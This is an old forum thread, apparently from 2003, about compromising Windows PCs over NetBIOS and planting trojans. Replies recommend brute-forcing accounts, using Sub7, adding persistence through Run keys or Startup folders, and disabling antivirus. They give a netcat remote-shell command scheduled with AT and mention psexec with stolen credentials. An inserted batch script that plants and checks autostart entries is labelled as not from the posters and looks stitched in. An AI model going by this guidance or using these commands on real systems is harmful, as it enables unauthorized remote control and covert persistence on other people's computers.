March 27th, 2003, 08:27 PM
Hi all. I have a home network comprised of 4 computers and I am wanting to start some penetration testing on them. I read some tutorials on the NetBIOS exploit to map a shared drive or folder and I understand that part. My question is: how do I remotely run a program on one of the computers from another, i.e. planting a trojan on one of the computers and running the server on that computer remotely from another computer? I'm sure this is a newbie question, but I have read tutorials and have not seemed to be able to find one that explains it that far. So basically I am wanting to see if I can use NetBIOS to break into my other computers and plant a trojan, then be able to run the server on that computer from another computer. Thanks for the help!
March 27th, 2003, 08:39 PM
Well, let me ask you this: "Have you looked into NetBIOS vulnerabilities and enumeration techniques?"
If you have, then you can start by brute forcing enumerated accounts on these boxes. Once you have compromised a box, you can easily get the trojan on the machine and then run your remote console.
I'd grab Sub7 and use that for your testing. That should produce good results. Just google it.
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
March 27th, 2003, 08:43 PM
I've done this on my network too... but not much. It got rather boring.
I put the server part of the trojan in a popular startup location. You can put it anywhere and have a shortcut to it added in the registry or in the startup folder. If you put a script to add a startup key into the registry from the startup folder, you will have to wait 2 reboots. If you just put a shortcut in the startup folder, you only have to wait for one reboot.
If they are running a terminal service such as Remote Desktop, telnet, ssh, etc., you can run commands remotely. If not, you'd have to exploit a service that has not been patched and allows you to take full control of the system or run certain commands...
Just remember to disable your antivirus as it'll catch it right away. That is unless you created your own trojan and aren't using one you downloaded.
March 27th, 2003, 08:45 PM
Well, you're definitely pushing the edge on this question. But since it's your "home network comprised of 4 computers" I guess I could shed a bit of light, without going too far.
Well, once you learn how to map the other drive (c$) then you pretty much have control of the computer. Through Explorer you can edit/create/delete any files you need. So from here you could pretty much do anything you want. To run a program you have several options. Just think about what gets run each time your computer starts. Where are these programs called from? (registry, autoexec, batch files, etc.)
Well, this is computer knowledge. I myself have trojaned my boxes with countless types of trojans and viruses just to see how these things work. It's great experience for those getting into security. If you learn the methods these programs use to take control, you can easily defeat them. Just be sure you're doing this to a test box and not your mom's or dad's work computer. I'm sure they won't be too happy. Also be sure to put up a firewall on the main connection. Most trojans have backdoors for everyone using that trojan. Some even have the ability to take down firewalls and spread through NetBIOS, etc. So just make sure you have a secure testing platform.
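The autostart locations named in the two posts above (registry Run keys, the Startup folder, autoexec.bat), as an added example that is not from either poster: a lab-only cmd.exe script that plants a test program both ways and then enumerates the same locations, which is the check a defender runs before the reboot that would fire the entry. Paths are Windows 2000/XP-era, C:\lab\server.exe is a placeholder for the test program, and reg.exe is assumed present (it ships with XP).

```batch
@echo off
rem Added lab-only demo, not the posters' code. SERVER_EXE is a placeholder
rem (assumption); Start Menu paths are the Windows 2000/XP layout (assumption).
set SERVER_EXE=C:\lab\server.exe

rem --- Plant 1: per-user Run key. Added directly with reg.exe it fires at the
rem     next logon, so only one reboot is needed (the two-reboot case above is
rem     when a startup-folder script adds the key on the first boot).
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v LabServer /t REG_SZ /d "%SERVER_EXE%" /f

rem --- Plant 2: per-user Startup folder. A copy of the exe behaves like the
rem     shortcut described above and runs on the first reboot.
copy "%SERVER_EXE%" "%USERPROFILE%\Start Menu\Programs\Startup\"

rem --- Check: list every location an attacker following the advice above
rem     could have used, so the planted entry is found before it runs.
echo === Run / RunOnce keys ===
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
echo === Startup folders ===
dir /b "%USERPROFILE%\Start Menu\Programs\Startup"
dir /b "%ALLUSERSPROFILE%\Start Menu\Programs\Startup"
echo === autoexec.bat (Win9x-style startup, still read on NT for env vars) ===
if exist %SystemDrive%\autoexec.bat type %SystemDrive%\autoexec.bat
echo === Scheduled jobs (the AT method) ===
at

rem --- Cleanup so the lab box does not stay trojaned.
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v LabServer /f
del "%USERPROFILE%\Start Menu\Programs\Startup\server.exe"
```

The check section is the part worth keeping on a real box: a Run value whose data points outside %SystemRoot% or %ProgramFiles%, or an unfamiliar file in either Startup folder, is exactly what the planting steps leave behind. Run the script as the user whose HKCU hive you planted into, since reg.exe queries the hive of the calling account.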
March 27th, 2003, 09:05 PM
To answer your question HyperFlash, if you're trying to run a command on a remote machine on your LAN you can do the following. First, I'm going to assume that you have a valid account on the remote machine. From there, you have several different avenues to travel; you should probably start by copying NC (Net Cat) over to a system folder (%systemdrive%\winnt\system32 or %systemdrive%\windows\system32), then use the AT command (AT time:to_run /every:M,T,W,TH,F,S,SU "your_command_here"; use help for proper usage) to remotely schedule Net Cat to run. You can set parameters (nc -L -d -p [port] -t -e cmd.exe) in your Net Cat command argument so that when you telnet to the port you set Net Cat to listen on, it will throw you a phat command prompt. You might want to run net time to find out the time on the remote machine before you start to schedule. Hope this helps in your pen testing endeavours.
March 27th, 2003, 11:22 PM
psexec.exe from "pstools" lets you run programs remotely (if you have the user/pass from the "victim").